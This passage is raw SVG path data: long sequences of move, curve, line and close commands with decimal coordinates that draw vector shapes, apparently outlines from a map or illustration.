668.35748,130.0625 668.60626,128.375 668.34174,127 C 667.88487,124.62514 667.52641,124.50223 661.1804,124.54458 C 657.50618,124.5691 653.41563,124.21541 652.09028,123.75861 C 650.64983,123.26213 647.43199,123.42433 644.09028,124.16188 C 638.37914,125.42238 635.35139,127.7022 637.06732,129.45 C 637.58029,129.9725 638,131.19963 638,132.17695 C 638,133.15427 639.2375,134.74137 640.75,135.70385 C 642.2625,136.66632 643.83061,137.9142 644.23469,138.4769 C 644.71427,139.14474 644.97469,139.09846 644.98469,138.3436 C 644.99607,137.48421 645.89892,137.46309 648.5,138.26138 C 650.425,138.85218 652,139.75821 652,140.27477 C 652,140.79133 652.66059,140.96049 653.46797,140.65066 C 654.27536,140.34084 655.13192,140.40519 655.37143,140.79367 C 656.30877,142.31401 664.9228,141.22305 667.64637,139.23907 z M 606,133 C 606,132.45 606.92656,132 608.05902,132 C 609.19148,132 609.85914,131.58109 609.54271,131.0691 C 609.22627,130.5571 609.43206,129.85101 610,129.5 C 610.56794,129.14899 610.79984,128.48514 610.51532,128.02478 C 609.79721,126.86286 606.02244,127.97308 606.28576,129.26875 C 606.40359,129.84856 605.6,130.58779 604.5,130.91147 C 601.84053,131.69406 601.46723,134 604,134 C 605.1,134 606,133.55 606,133 z M 694.37543,132.51624 C 695.45796,131.6965 695.9997,130.44161 695.65681,129.54804 C 695.21389,128.39382 695.75437,127.97992 697.78138,127.92105 C 699.27662,127.87763 699.91193,127.60661 699.19318,127.31878 C 696.72081,126.3287 693.49219,122.39833 693.80727,120.76223 C 694.05815,119.45955 693.30939,119.13489 690.15458,119.17843 C 687.97205,119.20855 685.7255,118.94839 685.16227,118.60029 C 684.59903,118.25219 683.86769,118.40506 683.53707,118.94001 C 683.20646,119.47497 682.20154,119.63083 681.30393,119.28639 C 680.17213,118.85207 679.90628,119.03934 680.43657,119.89737 C 680.92887,120.69392 680.45302,121.33028 679.10062,121.68394 C 677.94528,121.98607 677,122.81622 677,123.52873 C 677,124.25405 675.29305,125.11259 673.12157,125.47946 C 669.55806,126.08151 669.26216,126.37654 669.47741,129.11285 L 669.71169,132.09099 L 679.0673,132.59029 C 684.21289,132.8649 688.62776,133.29443 688.87813,133.54479 C 689.76621,134.43287 692.52633,133.91645 694.37543,132.51624 z M 635.08234,123.18265 C 635.81764,124.49656 636.72906,124.58638 640.72957,123.73921 C 643.35331,123.1836 647.525,122.60166 650,122.44601 C 657.39087,121.98122 658.87946,121.16135 660.0195,116.9276 C 660.58867,114.81386 661.5228,112.79493 662.09535,112.44107 C 662.6679,112.08722 662.89479,111.16822 662.59956,110.39885 C 661.73511,108.14614 663.82987,108.78912 666.18695,111.5 C 667.3825,112.875 668.95452,114 669.68034,114 C 671.6357,114 671.28141,111.02567 669.25,110.38726 C 668.2875,110.08478 666.375,109.35184 665,108.7585 C 662.57604,107.71253 662.62927,107.65238 666.75,106.78101 C 669.0875,106.28672 671,105.45021 671,104.9221 C 671,104.39399 669.93969,104.22802 668.64376,104.55328 C 667.23844,104.90599 665.72142,104.57856 664.88483,103.74197 C 664.11335,102.97049 662.92366,102.52545 662.24107,102.75298 C 661.55848,102.98051 660.97407,102.79167 660.94238,102.33333 C 660.9107,101.875 660.71538,99.903531 660.50834,97.952291 C 660.02842,93.429076 660.45452,92.869757 666.5,90.087438 C 673.19136,87.007863 674.49083,85.927846 672.79733,84.853584 C 670.84995,83.618269 665.81006,83.899005 663.1149,85.392922 C 661.44811,86.316816 661.09668,86.941716 661.94798,87.467853 C 663.36671,88.344675 658.01476,91.979506 655.22583,92.033269 C 653.12117,92.073841 649.69872,94.825909 648.14682,97.725663 C 646.68843,100.4507 646.70546,100.99476 648.25,101.02224 C 648.9375,101.03447 650.4634,101.82197 651.64089,102.77224 L 653.78178,104.5 L 651.17338,107 C 649.73876,108.375 648.43786,109.3875 648.28249,109.25 C 647.34117,108.41694 646.15458,109.30086 645.65629,111.20633 C 645.01437,113.66107 643.77718,113.01033 643.31384,109.97423 C 643.11283,108.65708 643.59291,107.98893 644.75627,107.96673 C 648.57368,107.8939 652.33325,102.8409 648.91667,102.375 C 648.4125,102.30625 647.55,102.19375 647,102.125 C 645.67184,101.95898 645.72971,98.687337 647.11456,95.647909 C 647.88731,93.951913 649.80406,92.703339 653.36456,91.576657 C 659.94986,89.492808 661.60231,88.49028 660.04162,87.525723 C 657.98892,86.257085 661.95177,83 665.548,83 C 667.50375,83 669.01396,82.405994 669.36163,81.5 C 669.67821,80.675 669.44887,80 668.85198,80 C 668.2551,80 668.00258,79.098123 668.29084,77.995829 C 668.69692,76.442969 668.21652,75.861387 666.15747,75.413153 C 664.69586,75.094976 662.2625,74.445262 660.75,73.969344 C 659.07541,73.442424 658,73.474755 658,74.05202 C 658,74.573409 656.22656,75 654.05902,75 C 651.89148,75 649.85207,75.430347 649.52699,75.956326 C 649.20192,76.482305 648.26963,76.656961 647.45524,76.34445 C 646.64085,76.031939 645.30526,76.331693 644.48727,77.010569 C 643.29391,78.000969 642.99697,77.973674 642.98469,76.872445 C 642.97266,75.794458 642.7614,75.821825 642,77 C 641.46684,77.825 641.03063,78.95 641.03063,79.5 C 641.03063,80.05 641.41748,79.889457 641.89031,79.143237 C 642.44258,78.271646 642.97869,78.156502 643.38952,78.821241 C 643.74126,79.390362 643.11597,80.145804 642,80.5 C 640.88403,80.854196 640.22905,81.561594 640.5445,82.071996 C 640.85994,82.582398 640.24396,83 639.17565,83 C 637.18939,83 635.64552,85.998547 635.9577,89.25 C 636.08365,90.561876 635.4215,90.975044 633.31286,90.90032 L 630.5,90.80064 L 633,90 C 634.375,89.559648 634.86776,89.154504 634.09501,89.09968 C 632.96793,89.019716 633.01737,88.638283 634.34501,87.171259 C 635.25526,86.165452 636,84.574619 636,83.636076 C 636,82.279536 635.61686,82.134681 634.13148,82.929632 C 633.1038,83.479632 631.95501,83.621681 631.57863,83.245297 C 631.20225,82.868912 631.17562,83.294091 631.51947,84.190139 C 631.93932,85.284262 631.48085,86.029996 630.12347,86.460811 C 629.01183,86.813633 627.8359,87.941675 627.51029,88.967571 C 626.91169,90.853592 621.44939,93.395772 619.96575,92.478833 C 619.52327,92.205364 618.55175,92.548254 617.80681,93.240809 C 617.06187,93.933364 615.8713,94.622266 615.16108,94.771703 C 614.45087,94.92114 612.88658,95.961435 611.68489,97.083471 C 610.19807,98.471736 610.02681,98.92227 611.14885,98.493594 C 612.05572,98.147126 613.09674,98.347509 613.46223,98.938889 C 613.82772,99.530269 613.42583,100.2831 612.56913,100.61185 C 611.71242,100.94059 611.23132,101.56526 611.5,102 C 611.76868,102.43474 611.32368,103.04555 610.51112,103.35736 C 609.67609,103.67779 609.2889,104.58929 609.62061,105.45372 C 609.96306,106.34612 609.54192,107.23855 608.6095,107.59636 C 605.85636,108.65283 607.93513,110 612.31847,110 C 615.49213,110 616.837,109.49065 617.82019,107.91632 C 618.53589,106.77029 619.7319,106.06688 620.47798,106.35317 C 621.22405,106.63947 622.0826,106.22713 622.38586,105.43686 C 622.68911,104.64659 623.42791,104 624.02763,104 C 624.62735,104 624.86906,104.40285 624.56476,104.89522 C 624.26046,105.38758 624.6839,106.04846 625.50574,106.36383 C 626.4134,106.71213 627,106.3607 627,105.46862 C 627,104.66088 627.675,104 628.5,104 C 630.30819,104 630.43321,102.83321 628.8,101.2 C 627.86667,100.26667 628.03333,99.993243 629.55,99.969591 C 631.18448,99.944103 631.25064,99.793173 629.95891,99.036816 C 628.34885,98.094061 627.37602,91.504235 628.72374,90.669979 C 629.15068,90.405697 629.43444,91.916703 629.3543,94.027769 C 629.25561,96.62759 629.69528,98.052827 630.71692,98.444868 C 631.84866,98.879154 631.94962,99.355779 631.1213,100.35384 C 630.51413,101.08544 630.3182,101.98487 630.6859,102.35257 C 631.05361,102.72027 630.3747,103.9339 629.17723,105.04952 C 626.44207,107.5977 626.45619,107.91956 629.5,112.40486 C 630.875,114.43104 632,116.75796 632,117.57579 C 632,119.80409 635.08404,120.60121 636.17348,118.65449 C 636.68273,117.74452 638.24415,117 639.64331,117 C 641.24775,117 642.36029,116.33824 642.65583,115.20812 C 642.91355,114.22258 644.00268,113.35008 645.07611,113.26922 C 646.88728,113.13279 646.91742,113.27982 645.49465,115.3111 C 643.91128,117.57167 643.69216,117.66539 639.5,117.875 C 638.02493,117.94875 637,118.60209 637,119.46862 C 637,120.36321 637.58629,120.71225 638.5,120.36163 C 639.325,120.04504 640,120.28417 640,120.89301 C 640,122.17799 639.88964,122.18146 634.17253,121.07656 C 630.83158,120.43087 629.72434,120.55479 629.31554,121.62011 C 629.0243,122.37905 628.15917,123 627.39301,123 C 626.62686,123 626,123.4138 626,123.91955 C 626,124.42531 627.84625,124.11388 630.10277,123.2275 C 633.82049,121.76713 634.28782,121.76293 635.08234,123.18265 z M 649.18689,113.25 C 649.37034,112.2875 650.57828,111.34966 651.87121,111.1659 C 653.44727,110.94191 653.98729,111.21155 653.50984,111.98408 C 653.11816,112.61783 652.19113,112.90359 651.44978,112.6191 C 650.58249,112.28629 650.30013,112.61856 650.65792,113.55093 C 650.96375,114.34792 650.68284,115 650.03366,115 C 649.38449,115 649.00344,114.2125 649.18689,113.25 z M 656,104 C 655.20686,103.50981 654.88989,102.77678 655.29563,102.37104 C 655.70137,101.9653 656.55833,102.15833 657.2,102.8 C 658.71091,104.31091 657.86759,105.15423 656,104 z M 676.61048,122.24654 C 677.33973,121.28594 677.9507,120.15136 677.9682,119.72525 C 678.0622,117.43516 662.02721,116.46337 661.26755,118.71312 C 661.04225,119.38033 661.98177,120.2083 663.35536,120.55305 C 664.72896,120.8978 666.66309,122.07522 667.65342,123.16953 C 669.78119,125.52068 674.49351,125.0351 676.61048,122.24654 z M 665.42974,123.11369 C 666.14055,121.96357 662.5726,121.0375 660.01125,121.70731 C 658.91743,121.99335 658.26899,122.62622 658.57026,123.11369 C 659.28201,124.26532 664.71799,124.26532 665.42974,123.11369 z M 1069.1276,122.25 C 1070.3714,120.66394 1070.3361,120.62857 1068.75,121.87244 C 1067.7875,122.62729 1067,123.41479 1067,123.62244 C 1067,124.44548 1067.8212,123.91575 1069.1276,122.25 z M 624.49292,122.01145 C 624.84326,121.44459 624.44186,121.27695 623.55194,121.61844 C 621.81952,122.28323 621.50255,123 622.94098,123 C 623.45852,123 624.1569,122.55515 624.49292,122.01145 z M 619,119.89159 C 619,118.1561 619.43133,117.89144 621.43871,118.39526 C 622.84625,118.74853 624.18009,118.51762 624.59322,117.84916 C 625.06007,117.09379 624.86861,116.96317 624.04271,117.47361 C 622.231,118.5933 620.84151,115.90041 622.3072,114.11012 C 623.31155,112.88335 623.10503,112.7574 621,113.31293 C 619.625,113.6758 617.8625,113.97884 617.08333,113.98635 C 616.30417,113.99386 615.96276,114.2961 616.32466,114.65799 C 616.68655,115.01989 616.42405,115.99307 615.74132,116.82061 C 614.75226,118.01948 614.75402,118.41074 615.75,118.74595 C 616.4375,118.97735 617,119.80417 617,120.58333 C 617,121.3625 617.45,122 618,122 C 618.55,122 619,121.05122 619,119.89159 z M 683.58262,117.75071 C 684.64242,116.69091 681.8817,112.83142 680.45533,113.37877 C 679.69013,113.6724 678.79808,113.48231 678.47301,112.95633 C 677.52691,111.42551 672.27409,111.84336 671.63837,113.5 C 671.02721,115.09267 667,115.61968 667,114.10699 C 667,112.41359 664.05414,112.08872 662.52894,113.61392 C 660.01692,116.12594 660.68552,116.50027 667.67345,116.49423 C 671.34378,116.49106 675.28126,116.98557 676.42339,117.59315 C 678.53416,118.71601 682.52939,118.80394 683.58262,117.75071 z M 682.21959,108.95719 C 682.45436,107.35758 682.1635,105.84836 681.57322,105.60336 C 680.98295,105.35835 681.175,105.08794 682,105.00244 C 686.97234,104.48711 689.86486,103.09655 686.41667,102.87917 C 681.80652,102.58852 673.0728,103.6342 672.08333,104.59529 C 671.85417,104.81788 673.65417,105.06742 676.08333,105.14983 C 679.25475,105.25742 679.65417,105.40522 677.5,105.67404 C 671.74874,106.39175 670,107.04779 670,108.48767 C 670,109.42884 670.58362,109.71328 671.66404,109.29868 C 672.78293,108.86932 673.09121,109.04341 672.60503,109.83006 C 672.11434,110.62401 672.8461,111 674.88197,111 C 676.53197,111 678.14793,111.43035 678.47301,111.95633 C 679.55067,113.70002 681.78613,111.91053 682.21959,108.95719 z M 682.3784,101.43627 C 685.42157,100.88444 691.19493,98.133965 694.49001,95.666199 C 696.43894,94.206598 696.42362,94.150137 693.74782,92.930963 C 691.71534,92.004899 691.28321,91.363679 692.06047,90.427144 C 692.82878,89.50138 692.58694,89.003674 691.14665,88.546543 C 689.18181,87.92293 688.90764,86.53777 690.30613,84.300173 C 690.76332,83.56867 690.19025,82.637002 688.83796,81.913277 L 686.6199,80.726207 L 688.78412,78.973726 L 690.94834,77.221244 L 687.97417,75.989302 C 684.48356,74.543443 684.36953,74.053856 686.89258,71.345676 C 688.7809,69.318802 688.77358,69.31531 683.64258,69.7945 C 680.81416,70.058649 678.38018,70.550448 678.23374,70.887386 C 677.0614,73.584765 675.72591,74.388607 672.5657,74.299028 C 669.20639,74.203805 669.03139,74.353573 669.58636,76.848931 C 669.91064,78.307019 670.16652,80.25837 670.155,81.185266 C 670.14184,82.244141 671.2242,83.109969 673.06703,83.514721 C 675.80436,84.115941 677.32476,87 674.90437,87 C 674.30177,87 672.58268,87.873031 671.08417,88.940068 C 669.58565,90.007105 667.7269,91.019605 666.95361,91.190068 C 666.18031,91.360531 664.98244,92.022321 664.29167,92.660714 C 663.60089,93.299107 662.51315,93.995617 661.87446,94.208514 C 660.9976,94.500799 661.00455,95.139992 661.90285,96.818466 C 662.55715,98.041043 662.83064,99.465011 662.51061,99.98284 C 660.98904,102.44478 672.26697,103.26982 682.3784,101.43627 z M 610,101.16667 C 610,100.70833 609.325,100.33333 608.5,100.33333 C 607.675,100.33333 607,100.70833 607,101.16667 C 607,101.625 607.675,102 608.5,102 C 609.325,102 610,101.625 610,101.16667 z M 718.5,87 C 717.70032,85.706093 716,85.706093 716,87 C 716,87.55 716.70156,88 717.55902,88 C 718.41648,88 718.83992,87.55 718.5,87 z M 639.7823,80.154497 C 640.06888,79.29387 639.58805,78.933502 638.44803,79.154497 C 637.46777,79.344523 636.46412,80.105477 636.2177,80.845503 C 635.93112,81.70613 636.41195,82.066498 637.55197,81.845503 C 638.53223,81.655477 639.53588,80.894523 639.7823,80.154497 z M 841.95,79.966731 C 844.4207,79.913699 847.58111,76.702354 847.57606,74.25 C 847.57351,73.0125 847.46932,72 847.34453,72 C 846.74975,72 838,81.077234 838,81.694276 C 838,82.082424 838.54,81.86 839.2,81.2 C 839.86,80.54 841.0975,79.985029 841.95,79.966731 z M 743.36163,77.5 C 743.68001,76.670308 745.18015,75.993157 746.71862,75.984687 C 748.88185,75.972778 749.16663,75.753935 748,75 C 746.09037,73.765903 742,73.710146 742,74.918213 C 742,75.423229 741.72686,76.548229 741.39301,77.418213 C 741.05917,78.288196 741.23602,79 741.78602,79 C 742.33602,79 743.04504,78.325 743.36163,77.5 z M 774,73.440983 C 774,73.198442 773.29844,73 772.44098,73 C 771.58352,73 771.16462,73.45734 771.51008,74.016312 C 772.08089,74.939894 774,74.496458 774,73.440983 z M 657.64832,72.494541 C 658.98893,71.153928 658.89898,71.036292 656.82689,71.42023 C 655.5471,71.657363 653.2625,71.884819 651.75,71.92569 C 650.2375,71.96656 649,72.45 649,73 C 649,74.574177 655.97642,74.166433 657.64832,72.494541 z M 676.80627,71.165257 C 677.87494,69.555752 679.30348,68.979737 682.37197,68.921053 C 684.64239,68.877632 685.825,68.585157 685,68.271109 C 684.175,67.95706 683.16939,67.205087 682.76531,66.600056 C 682.26853,65.856219 682.02567,65.930503 682.01531,66.829455 C 682.00442,67.775281 681.16179,67.974808 679.0952,67.520909 C 677.42889,67.154926 675.91147,67.33423 675.53618,67.941454 C 674.57002,69.504737 672.69831,69.228582 673.31782,67.614154 C 673.74869,66.491315 673.26226,66.521324 670.75466,67.772276 C 669.05244,68.621458 666.04877,69.428119 664.07985,69.564856 C 659.16714,69.906032 659.18988,69.884023 662,71.577151 L 664.5,73.08343 L 662,72.476209 C 660.43994,72.097288 659.96962,72.197572 660.74908,72.742939 C 661.43607,73.223613 665.0065,73.552456 668.68337,73.473702 C 674.33893,73.352567 675.59002,72.997019 676.80627,71.165257 z M 742.25,403.96969 C 741.0125,403.47181 739.98025,402.26245 739.95611,401.28222 C 739.93197,400.302 739.26869,397.7 738.48215,395.5 C 737.13052,391.71938 737.18103,391.31817 739.40312,388.18464 C 741.46441,385.27788 741.63109,384.38442 740.75556,380.93512 C 739.43695,375.74018 741.03911,371.89646 745.27474,370.09324 C 749.0989,368.46519 754,364.13606 754,362.38623 C 754,361.70446 754.78669,360.99515 755.7482,360.80997 C 756.70972,360.6248 757.49722,359.61805 757.4982,358.57274 C 757.50334,353.14023 762.64527,359.94007 763.11458,366 C 763.36877,369.28216 762.03195,374 760.84776,374 C 760.33327,374 760.02062,374.5625 760.15297,375.25 C 760.28533,375.9375 758.47234,382.41629 756.1241,389.64732 C 752.5787,400.56483 751.48531,402.87505 749.67729,403.26873 C 748.47978,403.52947 746.825,403.99754 746,404.30887 C 745.175,404.62021 743.4875,404.46758 742.25,403.96969 z M 747.70295,402.77035 C 749.24133,402.09405 750.83587,401.08155 751.24638,400.52035 C 752.38905,398.95825 759.38638,376.65987 759.15267,375.32541 C 759.03953,374.67938 759.41055,373.8643 759.97715,373.51412 C 760.54888,373.16077 760.71659,371.71898 760.35399,370.27429 C 759.83779,368.21757 760.01532,367.7919 761.19974,368.24641 C 762.44744,368.72519 762.57591,368.14939 761.96579,364.81292 C 761.56261,362.6081 760.44198,360.06073 759.4755,359.15208 C 758.50902,358.24344 758.01663,358.03567 758.38131,358.69039 C 758.74598,359.3451 758.16366,360.70126 757.08727,361.70407 C 756.01088,362.70688 754.64465,364.80445 754.0512,366.36534 C 753.33661,368.24485 752.47436,369.01227 751.4981,368.63764 C 750.68734,368.32653 750.13109,368.58034 750.262,369.20168 C 750.3929,369.82302 748.94698,370.66851 747.04886,371.08054 C 741.52863,372.27881 739.72045,376.09759 742.14925,381.42822 C 743.13345,383.5883 742.9305,384.50664 740.73608,387.82263 C 738.20625,391.64545 738.19401,391.75708 739.77372,396.59736 C 740.65375,399.29381 742.07718,402.04819 742.93689,402.7182 C 744.87289,404.227 744.40128,404.22184 747.70295,402.77035 z M 1168.5,391.83574 C 1165.8803,390.39041 1161,385.84102 1161,384.84429 C 1161,384.41446 1161.6608,384.31633 1162.4684,384.62624 C 1163.276,384.93615 1163.8385,385.70953 1163.7184,386.34486 C 1163.5983,386.98019 1164.2875,387.36777 1165.25,387.20616 C 1166.2125,387.04455 1167,387.32746 1167,387.83484 C 1167,388.34223 1168.35,389.31655 1170,390 C 1173.0226,391.25199 1174.068,393.02598 1171.75,392.96959 C 1171.0625,392.95287 1169.6,392.44264 1168.5,391.83574 z M 988,391.16017 C 988,390.23033 996.41648,385.85089 997.66576,386.13068 C 998.12459,386.23344 999.175,386.04329 1000,385.70813 C 1000.825,385.37297 1003.4626,384.5957 1005.8612,383.98088 C 1010.1784,382.87429 1015.219,378.70898 1014.7989,376.59507 C 1014.3908,374.54109 1017.4757,371 1019.6732,371 C 1020.9773,371 1022.119,370.20044 1022.4918,369.02598 C 1023.1183,367.05175 1027.0099,363.86174 1030.1862,362.7186 C 1031.1557,362.36967 1032.9846,362.98663 1034.4893,364.17025 C 1036.3944,365.66878 1037.9298,366.06405 1040.1335,365.6233 C 1042.3009,365.18982 1043.042,365.37037 1042.7426,366.25893 C 1042.5127,366.94152 1041.3755,367.51352 1040.2156,367.53004 C 1039.0556,367.54656 1037.7826,367.88406 1037.3866,368.28004 C 1036.0817,369.585 1035,369.03161 1035,367.05902 C 1035,365.99148 1034.5228,364.82313 1033.9396,364.4627 C 1032.313,363.45737 1027.1413,365.97954 1026.4659,368.10755 C 1026.1355,369.1484 1025.4455,370 1024.9326,370 C 1024.4197,370 1024.1125,370.5625 1024.25,371.25 C 1024.3875,371.9375 1023.7173,372.43831 1022.7608,372.3629 C 1021.8042,372.2875 1021.2704,372.62845 1021.5745,373.12058 C 1021.8787,373.6127 1021.4497,374.69316 1020.6212,375.52161 C 1019.2796,376.8633 1019.0138,376.84712 1018.1892,375.37354 C 1017.1333,373.48681 1014.8239,374.37764 1015.5907,376.37588 C 1016.4498,378.61464 1010.6785,383.74428 1005.9301,384.96233 C 1003.4935,385.58736 1000.825,386.36913 1000,386.6996 C 999.175,387.03008 997.7382,387.45111 996.8071,387.63524 C 995.87601,387.81937 993.51351,388.86908 991.5571,389.96793 C 989.6007,391.06677 988,391.60328 988,391.16017 z M 1175,390 C 1175,389.45 1175.45,389 1176,389 C 1176.55,389 1177,389.45 1177,390 C 1177,390.55 1176.55,391 1176,391 C 1175.45,391 1175,390.55 1175,390 z M 780.45888,388.93347 C 780.09635,388.34688 780.03985,387.62682 780.33333,387.33333 C 781.04965,386.61702 783,387.87916 783,389.05902 C 783,390.33699 781.27359,390.25169 780.45888,388.93347 z M 1172,388.05902 C 1172,387.54148 1172.45,386.83992 1173,386.5 C 1173.55,386.16008 1174,386.58352 1174,387.44098 C 1174,388.29844 1173.55,389 1173,389 C 1172.45,389 1172,388.57656 1172,388.05902 z M 787.125,386.125 C 787.54325,384.87026 789,384.57891 789,385.75 C 789,386.1625 788.49375,386.66875 787.875,386.875 C 787.25625,387.08125 786.91875,386.74375 787.125,386.125 z M 1180,383.05902 C 1180,382.47656 1180.45,382 1181,382 C 1182.2814,382 1182.2814,382.70806 1181,383.5 C 1180.45,383.83992 1180,383.64148 1180,383.05902 z M 1210.5,381 C 1211.2997,379.70609 1213,379.70609 1213,381 C 1213,381.55 1212.2984,382 1211.441,382 C 1210.5835,382 1210.1601,381.55 1210.5,381 z M 1179,380 C 1179,378.71862 1179.7081,378.71862 1180.5,380 C 1180.8399,380.55 1180.6415,381 1180.059,381 C 1179.4766,381 1179,380.55 1179,380 z M 1208.5353,378.05719 C 1207.5854,376.52015 1208.8247,375 1211.0276,375 C 1212.1458,375 1212.7382,374.48126 1212.4569,373.74835 C 1212.1666,372.99168 1213.3654,372.06203 1215.4883,371.39756 C 1218.6025,370.42282 1219,370.50038 1219,372.08279 C 1219,373.286 1218.1043,373.97021 1216.25,374.18358 C 1214.2721,374.41116 1213.5,375.06156 1213.5,376.5 C 1213.5,378.68992 1209.669,379.89152 1208.5353,378.05719 z M 1212.5,377 C 1212.8399,376.45 1212.1915,376 1211.059,376 C 1209.9266,376 1209,376.45 1209,377 C 1209,378.29836 1211.6976,378.29836 1212.5,377 z M 61.582949,377.13421 C 61.152178,376.43721 61.06979,375.59688 61.399864,375.2668 C 62.294825,374.37184 63.270632,375.6881 62.787251,377.13825 C 62.448526,378.15442 62.212984,378.15363 61.582949,377.13421 z M 1176,376 C 1176,375.45 1176.45,375 1177,375 C 1177.55,375 1178,375.45 1178,376 C 1178,376.55 1177.55,377 1177,377 C 1176.45,377 1176,376.55 1176,376 z M 1174.8371,373.32745 C 1173.1853,372.88984 1169.403,366.2637 1170.2955,365.37117 C 1170.552,365.11465 1171.5237,365.66658 1172.4548,366.5977 C 1173.818,367.96082 1173.8899,368.45416 1172.8239,369.13 C 1171.8272,369.76192 1171.9471,369.97316 1173.309,369.98469 C 1174.304,369.99311 1174.8399,370.45 1174.5,371 C 1174.1601,371.55 1174.148,372 1174.4732,372 C 1174.7984,372 1175.4342,371.00034 1175.8862,369.77854 C 1176.6419,367.73561 1176.746,367.81598 1177.1808,370.77854 C 1177.4408,372.55034 1177.3941,373.9478 1177.0768,373.884 C 1176.7596,373.8202 1175.7517,373.56975 1174.8371,373.32745 z M 1243.4411,362.5318 C 1241.8893,361.35803 1241.8126,361.05723 1243.0589,361.0318 C 1243.9162,361.01431 1245.4912,361.66069 1246.5589,362.4682 C 1248.1107,363.64197 1248.1874,363.94277 1246.9411,363.9682 C 1246.0838,363.98569 1244.5088,363.33931 1243.4411,362.5318 z M 741,357.55902 C 741,357.31648 741.45,356.83992 742,356.5 C 742.55,356.16008 743,356.35852 743,356.94098 C 743,357.52344 742.55,358 742,358 C 741.45,358 741,357.80156 741,357.55902 z M 737.54271,356.0691 C 737.22627,355.5571 737.42472,354.85554 737.98369,354.51008 C 738.54266,354.16462 739,354.58352 739,355.44098 C 739,357.19751 738.39994,357.45614 737.54271,356.0691 z M 1124,355 C 1123.0987,354.41754 1122.9754,354.02451 1123.691,354.01531 C 1124.346,354.00689 1125.1601,354.45 1125.5,355 C 1126.2673,356.24153 1125.9211,356.24153 1124,355 z M 1147,355 C 1147,353.70609 1148.7003,353.70609 1149.5,355 C 1149.8399,355.55 1149.4165,356 1148.559,356 C 1147.7016,356 1147,355.55 1147,355 z M 1018.6439,350.01207 C 1019.4637,348.36871 1020.8917,346.5824 1021.8172,346.04248 C 1023.2052,345.23278 1023.2372,345.03532 1022,344.91525 C 1020.4225,344.76217 1017.5213,345.02058 1015,345.53872 C 1014.175,345.70826 1012.1928,345.88141 1010.595,345.92349 C 1007.8438,345.99595 1007.7777,346.09691 1009.3472,347.83115 C 1010.2586,348.83828 1010.7034,349.96328 1010.3355,350.33115 C 1009.3251,351.34157 1007,351.13261 1007,350.03138 C 1007,349.49865 1007.7875,349.3161 1008.75,349.62572 C 1010.087,350.05582 1010.1789,349.95934 1009.1393,349.2169 C 1008.3909,348.68243 1006.9792,348.45418 1006.0022,348.70969 C 1005.0251,348.96519 1003.9234,348.68503 1003.5538,348.08712 C 1003.1571,347.44514 1003.6867,347 1004.8474,347 C 1006.3505,347 1006.6838,346.50697 1006.2646,344.90376 C 1005.7499,342.93578 1006.0281,342.83677 1010.8097,343.28563 C 1013.6109,343.5486 1016.1201,343.54658 1016.3855,343.28115 C 1017.292,342.37464 1026,342.22132 1026,343.11187 C 1026,343.60034 1026.7875,343.99311 1027.75,343.98469 C 1029.1407,343.97252 1029.2156,343.78929 1028.1149,343.09217 C 1026.9994,342.38568 1027.1197,342.0063 1028.7334,341.14267 C 1031.0871,339.883 1032.4393,340.76571 1030.9342,342.57932 C 1030.1267,343.55232 1030.3944,343.70962 1032.0992,343.2638 C 1035.8424,342.28495 1033.3426,344.73368 1029.2361,346.06848 C 1027.1812,346.7364 1025.1571,347.86398 1024.7379,348.57422 C 1024.1267,349.61 1018.5237,353 1017.423,353 C 1017.2747,353 1017.824,351.65543 1018.6439,350.01207 z M 1023.6705,348.41632 C 1024.0047,347.54529 1025.1949,346.49352 1026.3154,346.07904 C 1028.322,345.33674 1028.3199,345.31692 1026.1749,344.75598 C 1024.9772,344.44278 1024.2088,344.52875 1024.4673,344.94703 C 1024.7258,345.36531 1023.801,346.22526 1022.4123,346.85803 C 1021.0235,347.49079 1020.1642,348.45659 1020.5026,349.00425 C 1021.424,350.49508 1022.9839,350.20557 1023.6705,348.41632 z M 1011.25,344.33772 C 1010.5625,344.06031 1009.4375,344.06031 1008.75,344.33772 C 1008.0625,344.61513 1008.625,344.84211 1010,344.84211 C 1011.375,344.84211 1011.9375,344.61513 1011.25,344.33772 z M 1152.4589,351.93347 C 1152.0963,351.34688 1152.0504,350.61628 1152.3567,350.30993 C 1153.1794,349.48729 1156,350.77145 1156,351.96862 C 1156,353.32587 1153.3029,353.2991 1152.4589,351.93347 z M 1167.5,352 C 1168.2997,350.70609 1170,350.70609 1170,352 C 1170,352.55 1169.2984,353 1168.441,353 C 1167.5835,353 1167.1601,352.55 1167.5,352 z M 1111.8643,351.53094 C 1111.6063,351.27296 1109.9197,350.94945 1108.1162,350.81203 C 1105.7797,350.63399 1103.8619,349.4827 1101.4442,346.80657 C 1097.3583,342.28393 1093.979,341.20086 1090.8318,343.40523 C 1089.5796,344.28235 1088.9926,345.01431 1089.5275,345.0318 C 1090.0624,345.0493 1089.6963,345.67325 1088.714,346.41837 C 1086.6497,347.98422 1080.8981,347.07035 1078.1769,344.74416 C 1077.1293,343.84866 1075.0926,343.4653 1072.75,343.72268 C 1068.825,344.15392 1067.9604,343.10769 1070.5,341 C 1072.5222,339.32173 1072.3884,337.76349 1069.9567,334.67204 C 1068.7256,333.10695 1066.4399,331.8035 1064.2067,331.39294 C 1062.168,331.01816 1060.222,330.28357 1059.8821,329.76053 C 1059.5423,329.23748 1057.6318,328.76326 1055.6367,328.70671 C 1053.0788,328.6342 1051.8404,328.07252 1051.4371,326.80194 C 1051.1226,325.81087 1050.4955,325 1050.0437,325 C 1049.5919,325 1049.2847,324.23164 1049.3611,323.29253 C 1049.4389,322.33676 1048.2893,320.992 1046.75,320.23796 C 1043.5974,318.69366 1043.219,317.35075 1045.75,316.68933 C 1047.0669,316.34518 1046.9432,316.20329 1045.25,316.116 C 1042.1606,315.95672 1042.3918,314 1045.5,314 C 1046.875,314 1048,314.48032 1048,315.06739 C 1048,315.69235 1048.8595,315.86197 1050.0737,315.4766 C 1051.2143,315.11461 1053.4273,315.34858 1054.9917,315.99655 C 1057.2425,316.92888 1057.7446,317.678 1057.3984,319.58733 C 1057.1578,320.9143 1057.3894,322 1057.9131,322 C 1058.4367,322 1059.1509,322.9 1059.5,324 C 1060.317,326.57414 1061.6387,326.54358 1063.0439,323.91804 C 1063.9338,322.25518 1063.8289,321.59538 1062.5228,320.64033 C 1061.1828,319.6605 1061.8457,319.46145 1066.1938,319.53799 C 1069.1122,319.58936 1072.4,320.1051 1073.5,320.68407 C 1074.6,321.26304 1077.1682,322.03775 1079.2071,322.40565 C 1082.591,323.01621 1089.0497,325.43686 1094.7334,328.22473 C 1095.9618,328.82725 1097.2378,330.17395 1097.569,331.2174 C 1098.2764,333.44633 1103.2608,335.71757 1103.8125,334.06239 C 1104.0073,333.47808 1105.9026,333 1108.0243,333 C 1110.146,333 